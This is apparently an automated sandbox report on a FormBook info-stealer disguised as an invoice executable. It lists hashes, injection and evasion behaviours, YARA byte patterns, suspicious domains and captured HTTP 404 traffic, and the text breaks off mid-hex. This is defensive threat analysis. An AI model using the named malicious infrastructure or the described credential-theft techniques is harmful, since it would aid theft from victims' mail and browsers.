Windows Analysis Report
Invoice_&_SOA_ready_for_dispatch.exe

Overview

General Information

Sample Name: Invoice_&_SOA_ready_for_dispatch.exe
Analysis ID: 1340403
MD5: eea9bf4a16ab377328a59bde0a0c76df
SHA1: d6015abe7bd2ac246af5656410c7f7c7dc5f5637
SHA256: fd2ac4af2e4d90f117a8ba49d77cc480f0ad6a8a6cfa7479384d68ce27939f1a
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Invoice_&_SOA_ready_for_dispatch.exe (PID: 7784 cmdline: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe MD5: EEA9BF4A16AB377328A59BDE0A0C76DF)
    • RegSvcs.exe (PID: 7940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7948 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • xIXlFDyvSnsfUSfsjsGwj.exe (PID: 6900 cmdline: "C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fontview.exe (PID: 6224 cmdline: C:\Windows\SysWOW64\fontview.exe MD5: 8324ECE6961ADBE6120CCE9E0BC05F76)
          • xIXlFDyvSnsfUSfsjsGwj.exe (PID: 1180 cmdline: "C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3660 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2b053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17232:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x27cc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13e9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.RegSvcs.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2b053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17232:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a253:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16432:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: Invoice_&_SOA_ready_for_dispatch.exe, ReversingLabs: Detection: 42%
Source: Invoice_&_SOA_ready_for_dispatch.exe, Avira: detected
Source: Invoice_&_SOA_ready_for_dispatch.exe, Joe Sandbox ML: detected
Source: Invoice_&_SOA_ready_for_dispatch.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Invoice_&_SOA_ready_for_dispatch.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Windows\SysWOW64\fontview.exe, Code function: 12_2_02A4C300 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\fontview.exe, Code function: 4x nop then pop edi (12_2_02A41AC0)
Source: C:\Windows\SysWOW64\fontview.exe, Code function: 4x nop then xor eax, eax (12_2_02A399B0)
Source: C:\Windows\SysWOW64\fontview.exe, Code function: 4x nop then pop edi (12_2_02A3E36F)
Source: C:\Windows\SysWOW64\fontview.exe, Code function: 4x nop then pop edi (12_2_02A41ABF)

Networking

Source: DNS query: www.spark-tech-global.xyz
Source: DNS query: www.xn--4gq62f8w1alm9b.xyz
Source: Joe Sandbox View, IP Address: 84.32.84.32
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:27:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:45 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:45 GMT; SameSite=LaxSet-Cookie: _shopify_y=4449291f-7672-4969-ab63-6c8c671c5b94; Expires=Sat, 09-Nov-24 08:27:45 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=598daef1-c1fc-4481-949d-30a60bd7f1d1; Expires=Fri, 10-Nov-23 08:57:45 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=137X-Shopify-Stage: productionContent-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8cd67cc6-53bc-44cData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:27:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:48 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:48 GMT; SameSite=LaxSet-Cookie: _shopify_y=1c95b64a-cbaf-4aa7-b895-a0d261c3e83b; Expires=Sat, 09-Nov-24 08:27:48 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=589267fe-b53a-4fab-acae-faae851dc44c; Expires=Fri, 10-Nov-23 08:57:48 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=426X-Shopify-Stage: productionContent-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=1e7f5e7f-acb5-464Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:27:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:50 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:51 GMT; SameSite=LaxSet-Cookie: _shopify_y=8e7d96c0-29b1-4ebb-bc12-0695b29b2f51; Expires=Sat, 09-Nov-24 08:27:51 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=5a1d3429-a0f5-43f8-a851-d97cd1a79574; Expires=Fri, 10-Nov-23 08:57:51 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=155X-Shopify-Stage: productionContent-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=ed4b21a8-ae7c-4d8Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:28:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:28:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:28:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:28:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:29:13 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:29:16 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:29:19 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc 